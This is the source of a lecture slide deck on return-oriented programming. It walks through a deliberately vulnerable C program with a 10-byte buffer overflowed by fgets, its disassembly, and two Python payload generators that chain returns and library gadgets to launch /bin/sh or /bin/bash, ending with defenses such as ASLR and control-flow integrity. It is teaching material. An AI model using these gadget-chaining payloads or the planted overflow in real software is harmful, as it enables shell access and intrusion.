#lang rhombus/static/and_meta

import:
  rhombus/runtime_path
  "common.rhm" open
  "proc_call.rkt":
    expose:
      #{code-on-stack-picts}
      #{example-rop-stack}
      #{example-rop2-stack}

slide(~title: "Buffer Overflow Redux",
      slide.align(
        para(@{The goal of a buffer overflow attack is to run code different},
             @{than intended by the program author}),
        blank(),
        para(@{If the attacker wants to run an existing function, then a},
             @{simple buffer overflow attack may suffice}),
        blank(),
        para(@{What if the program does not already have the right code?})
      ))

slide(~title: "Code on Stack",
      block:
        let PairList[h, ...] = #{code-on-stack-picts}()
        slide.alts(Pict.from_handle(h), ...))

slide(~title: "Return-Oriented Programming",
      slide.align(
        para(@{@defterm{Return-oriented programming (ROP)} is an attack technique},
             @{that uses a program's existing machine code}),
        slide.next,
        blank(),
        para(@{Machine-code @defterm{gadgets} are combined to do things that were not in the original source code!})
      ))

def bug = @tt{fgets(name, 256, f);}
def bin_date = @tt{"/bin/date"}

def hello_c:
  @verbatim|{
#include <unistd.h>
#include <stdio.h>

void say_hello() {
  char name[10];
  printf("[debug: reading into %p]\n", name);
  FILE *f = fopen("name", "rb");
  |@bug
  fclose(f);
  printf("hello %s\n", name);
}

char *get_shell_path() {
  return "/bin/sh";
}

void show_date() {
  extern char** environ;
  char *bin_date = |@bin_date;
  char *argv[2] = {bin_date, NULL};
  execve(bin_date, argv, environ);
}

int main(int argc, char **argv) {
  say_hello();
  show_date();
  return 0;
}
}|

def broken_title = "Another Broken Program"
def broken_program = hello_c.scale(0.5)
def broken_program_bug:
  balloon.pin(~on: broken_program,
              ~at: Find.right(bug),
              ~spike: #'w,
              ~dx: -64,
              @para{buffer overflow bug})


slide(~title: broken_title,
      slide.alts(broken_program,
                 broken_program_bug))

def buffer_pip: @tt{ }

def say_hello_asm:
  @verbatim|{
_say_hello:
0000000100000e30  subq   $0x18, %rsp
0000000100000e34  leaq   0xe(%rsp), %rsi
0000000100000e39  leaq   0x114(%rip), %rdi  # "[debug: ....]\n"
0000000100000e40  movb   $0x0, %al
0000000100000e42  callq  0x100000f1e        # _printf
0000000100000e47  leaq   0x120(%rip), %rdi  # "name"
0000000100000e4e  leaq   0x11e(%rip), %rsi  # "rb"
0000000100000e55  callq  0x100000f18        # _fopen
0000000100000e5a  movq   %rax, (%rsp)
0000000100000e5e  leaq   0xe(%rsp), %rdi|@buffer_pip
0000000100000e63  movq   (%rsp), %rdx
0000000100000e67  movl   $0x100, %esi
0000000100000e6c  callq  0x100000f12        # _fgets
0000000100000e71  movq   (%rsp), %rdi
0000000100000e75  callq  0x100000f0c        # _fclose
0000000100000e7a  leaq   0xe(%rsp), %rsi
0000000100000e7f  leaq   0xf0(%rip), %rdi   # "hello %s\n"
0000000100000e86  movb   $0x0, %al
0000000100000e88  callq  0x100000f1e        # _printf
0000000100000e8d  addq   $0x18, %rsp
0000000100000e91  retq
}|

slide(~title: @titlely{Disassembly of @tt{say_hello}},
      block:
        let p = say_hello_asm.scale(0.65)
        slide.alts(
          p,
          balloon.pin(~on: p,
                      ~at: Find.left(buffer_pip),
                      ~spike: #'w,
                      ~dx: -64,
                      @para{@tt{0x18-0xe} is 10})
        ))

slide(~title: broken_title,
      balloon.pin(~on: broken_program_bug,
                  ~at: Find.right(bin_date),
                  ~spike: #'w,
                  ~dx: -64,
                  lines(@para{but @tt{show_date} always},
                        @para{runs @tt{/bin/date}})))

def rax_pip = @tt{ }

def show_date_asm:
  @verbatim|{
_show_date:
0000000100000eb0  subq  $0x18, %rsp
0000000100000eb4  leaq  0xad(%rip), %rax   # "/bin/date"
0000000100000ebb  movq  %rax, 0x10(%rsp)|@rax_pip
0000000100000ec0  movq  0x10(%rsp), %rax
0000000100000ec5  movq  %rax, (%rsp)
0000000100000ec9  movq  $0x0, 0x8(%rsp)
0000000100000ed2  movq  0x10(%rsp), %rdi
0000000100000ed7  movq  %rsp, %rsi
0000000100000eda  movq  0x11f(%rip), %rax  # _environ
0000000100000ee1  movq  (%rax), %rdx
0000000100000ee4  callq  0x100000f16       # _execve
0000000100000ee9  addq  $0x18, %rsp
0000000100000eed  retq
0000000100000eee  nop
}|

def get_shell_path_asm:
  @verbatim|{
_get_shell_path:
0000000100000ea0  leaq  0xb9(%rip), %rax # "/bin/sh"
0000000100000ea7  retq
}|

slide(~title: @titlely{Disassembly of @tt{show_date}},
      block:
        let p = show_date_asm.scale(0.7)
        slide.alts(p,
                   balloon.pin(~on: p,
                               ~at: Find.left(rax_pip),
                               ~spike: #'nw,
                               ~dy: 0,
                               ~dx: -32,
                               lines(@para{If only we could},
                                     @para{get here, but with},
                                     @para{@tt{"/bin/sh"} in RAX...}))))

slide(~title: @titlely{Disassembly of @tt{get_shell_path}},      
      get_shell_path_asm.scale(0.7),
      slide.next,
      blank(),
      slide.align(
        @para{Idea:}.pad(~left: -16),
        @t{@bold{Exploit overflow:} make @tt{say_hello} return to @tt{get_shell_path}},
        slide.right(@para{⇒ @tt{"/bin/sh"} in RAX}.colorize("blue")),
        slide.next,
        @t{@bold{Same overflow:} make @tt{get_shell_path} return to inside @tt{show_date}},
        slide.right(@para{right after @tt{"/bin/date"} assumed in RAX}.colorize("blue"))
      ))

def get_shell_path_ret = boldly(@tt{0x100000ea0})
def inside_show_date_ret = boldly(@tt{0x100000ebb})
def mystery = boldly(@tt{??????})

slide(~title: "Chaining Returns",
      block:
        let p:
          Pict.from_handle(#{example-rop-stack}(~ret1: get_shell_path_ret.snapshot().handle,
                                                ~ret2: inside_show_date_ret.snapshot().handle))
        let p2:
          balloon.pin(~on: p,
                      ~at: Find.right(get_shell_path_ret),
                      ~spike: #'nw,
                      ~dy: 0,
                      ~dx: -64,
                      @tt{get_shell_path})
        slide.alts(
          p,
          p2,
          balloon.pin(~on: p2,
                      ~at: Find.right(inside_show_date_ret),
                      ~spike: #'sw,
                      ~dy: 0,
                      ~dx: -64,
                      @para{inside @tt{show_date}})
        ))

def sh_exploit_py:
  @verbatim|{
import sys;

# address of `get_shell_path`:
get_shell_path = 0x100000ea0

# inside of `show_date` at the point where it expects
# "/bin/date" to be in RAX:
inside_show_date = 0x100000ebb

def n2b(v):
  return v.to_bytes(8, byteorder='little', signed=False)

sys.stdout.buffer.write(b"a"*10
                        + n2b(get_shell_path)
                        + n2b(inside_show_date))
}|

def exploit_title = "Constructing the Exploit"

slide(~title: exploit_title,
      sh_exploit_py)

slide(~title: "Return Oriented Programming",
      slide.align(
        para(@{ROP means chaining a sequence of return addresses},
             @{to construct a new program out of resident machine code}),
        slide.next,
        blank(),
        @para{In the example, having @tt{get_shell_path} was @italic{awfully} convenient...},
        blank(),
        @para{Could we construct our own string?},
        slide.next,
        @para{Could we include a path in the exploit and refer to it?}
      ))

def chaining_more_title = "Chaining More Returns"

slide(~title: chaining_more_title,
      block:
        let p:
          Pict.from_handle(#{example-rop2-stack}(~rets: PairList[mystery.snapshot().handle],
                                                 ~ret2: inside_show_date_ret.snapshot().handle))
        let function:
          @t{function}
        let p2:
          balloon.pin(~on: p,
                      ~at: Find.right(mystery),
                      ~spike: #'w,
                      ~dy: 0,
                      ~dx: -96,
                      lines(@para{no @function is going to return},
                            @para{a deeper stack position in RAX}))
        slide.alts(
          p,
          p2,
          balloon.pin(~on: p2,
                      ~at: Find.top(function),
                      ~spike: #'sw,
                      ~fill: "lightgreen",
                      lines(@para{but we don't have to call},
                            @para{a whole function!}))
        ))

def fgets_end_asm_top:
  @verbatim|{
    0x7ff8031a318a <+302>: movq   %rbx, %rax
    0x7ff8031a318d <+305>: addq   $0x18, %rsp
  }|

def fgets_end_asm_bottom:
  @verbatim|{
    0x7ff8031a3191 <+309>: popq   %rbx
    0x7ff8031a3192 <+310>: popq   %r12
    0x7ff8031a3194 <+312>: popq   %r13
    0x7ff8031a3196 <+314>: popq   %r14
    0x7ff8031a3198 <+316>: popq   %r15
    0x7ff8031a319a <+318>: popq   %rbp
    0x7ff8031a319b <+319>: retq   
  }|

fun c_library_slide(options :~ OptMap) :~ OptMap:
  fun label(p :~ Pict, on, side, q :~ Pict) :~ Pict:
    cond
    | !on: p
    | ~else:
        let brace = stack(~horiz: side,
                          line(~dx: 10),
                          line(~dy: p.height),
                          line(~dx: 10)).colorize("blue")
        let q = q.colorize("blue")
        if side == #'right
        | beside(~sep: 16, p, brace, q).refocus(p)
        | beside(~sep: 16, q, brace, p).refocus(p)
  slide(~title: "Using C Library Code",      
        @para{C library functions can be a rich source of code fragments}.pad(~right: 96),
        if options == {} | slide.next | nothing,
        blank(),
        slide.align(
          @para{End of @tt{fgets}:}.pad(~left: -16),
          label(stack(~horiz: #'left,
                      fgets_end_asm_top.ghost(!options[#'top]),
                      label(fgets_end_asm_bottom.pad(~right: 32),
                            options[#'pop6],
                            #'right,
                            lines(@bold{Gadget 1:},
                                  lines(@para{pops 6 words},
                                        @para{from the stack},
                                        @para{and puts them in},
                                        @para{registers, starting},
                                        @para{with RBX})
                                    .pad(~left: 8)))),
                options[#'pop9],
                #'left,
                lines(@bold{Gadget 2:},
                      lines(@para{RBX → RAX},
                            @para{then pops 9},
                            @para{words from},
                            @para{the stack})
                        .pad(~left: 8)))
        ))
  options

let options = c_library_slide({})
let options = c_library_slide(options ++ { #'pop6 })
let options = c_library_slide(options ++ { #'top })
let options = c_library_slide(options ++ { #'pop9 })

def gadget1_ret = boldly(@tt{0x7ff8031a3191})
def gadget2_ret = boldly(@tt{0x7ff8031a318a})
def stack_addr = boldly(@tt{0x30412a63e})
def any_addr = @italic{anything}
def any_h = any_addr.snapshot().handle

slide(~title: chaining_more_title,
      block:
        let p:
          Pict.from_handle(#{example-rop2-stack}(~rets: PairList[gadget1_ret.snapshot().handle,
                                                                 stack_addr.snapshot().handle,
                                                                 any_h, any_h, any_h, any_h, any_h,
                                                                 gadget2_ret.snapshot().handle,
                                                                 any_h, any_h, any_h,
                                                                 any_h, any_h, any_h,
                                                                 any_h, any_h, any_h],
                                                 ~ret2: inside_show_date_ret.snapshot().handle))
        let p: p.scale(0.5)
        let p1: balloon.pin(~on: p,
                            ~at: Find.right(gadget1_ret),
                            ~spike: #'w,
                            ~dx: -96,
                            @para{gadget 1})
        let p2: balloon.pin(~on: p1,
                            ~at: Find.left(stack_addr),
                            ~spike: #'e,
                            ~dx: 96,
                            lines(@para{address of @tt{name}},
                                  @para{on stack}))
        let p3: balloon.pin(~on: p2,
                            ~at: Find.right(gadget2_ret),
                            ~spike: #'w,
                            ~dx: -96,
                            @para{gadget 2})
        let p4: balloon.pin(~on: p3,
                            ~at: Find.right(inside_show_date_ret),
                            ~spike: #'w,
                            ~dx: -96,
                            @para{inside @tt{show_date}})
        slide.alts(
          p,
          p1,
          p2,
          p3,
          p4
        ))

def bash_exploit_py:
  @verbatim|{
import sys;

# pops 6 words into regsiters, including RBX:
pops = 0x7ff8031a3191
# move RBX into RAX, then pops 9 words:
move_and_pops = 0x7ff8031a318a

# location where `name` ends up on the stack:
buffer_on_stack = 0x30412a63e

# inside of `show_date` at the point where it expects
# "/bin/date" to be in RAX:
inside_show_date = 0x100000ebb

def n2b(v):
  return v.to_bytes(8, byteorder='little', signed=False)

sys.stdout.buffer.write(b"/bin/bash\x00"
                        + n2b(pops)
                        + n2b(buffer_on_stack)*6 # stack address into RBX
                        + n2b(move_and_pops)
                        + n2b(buffer_on_stack)*9 # stack address from RBX into RAX
                        + n2b(inside_show_date))
}|

slide(~title: exploit_title,
      bash_exploit_py.scale(0.6))

slide(~title: "Finding and Using Gadgets",
      slide.align(
        @para{Finding gadgets and combining them is tricky and tedious},
        blank(),
        @para{Can be automated by tools:},
        @item{gather gadgets},
        @item{generate a compiler than uses the gadgets},
        slide.next,
        blank(32),
        slide.alts(
          [@para{x86 bonus:},
           @item{instructions have varying lengths},
           @item{@tt{ret} is @tt{0xC3}},
           slide.right(@para{⇒ might find a @tt{0xC3} in the middle of an instruction}.colorize("blue"))],
          [@para{Reducing gadget dependence:},
           @item{Implement most of attack as direct machine code},
           @item{Use gadgets only as needed to call @tt{mprotect}}]
        )
      ))

slide(~title: "Defenses Against ROP",
      slide.align(
        @para{ASLR: makes finding gadgets and buffers much harder},
        slide.next,
        blank(),
        stack.left(
          ~sep: 8,          
          @para{Compiler adjustments to reduce useful gadgets:},
          @item{avoid @tt{0xC3} in non-return instruction encodings},
          @item{add ``poison'' instructions before each return}
        ),
        slide.next,
        blank(),
        stack.left(
          ~sep: 8,
          para(@{@defterm{Control flow integrity (CFI)}: check target address},
               @{before jumping}),
          item(@{LLVM CFI option inserts checks and uses link-time optimization to build},
               @{a map of valid target addresses}),
          item(@{Intel @bold{Control-flow Enforcement Technology} keeps a shadow},
               @{stack for calls and returns}),
          item(@{Windows @bold{Control Flow Guard} keeps a per-process bitmap of valid},
               @{return and jump addresses}),
        )        
      ))

slide(~title: "Summary",
      slide.align(
        @para{@defterm{Return-oriented programming (ROP)} exploits a buffer overflow}.pad(~left: -16),
        @para{to create a new program that's not in the original source},
        @para{by chaining @defterm{gadgets}: existing machine-code fragments that end in @tt{ret} instructions}
      ))

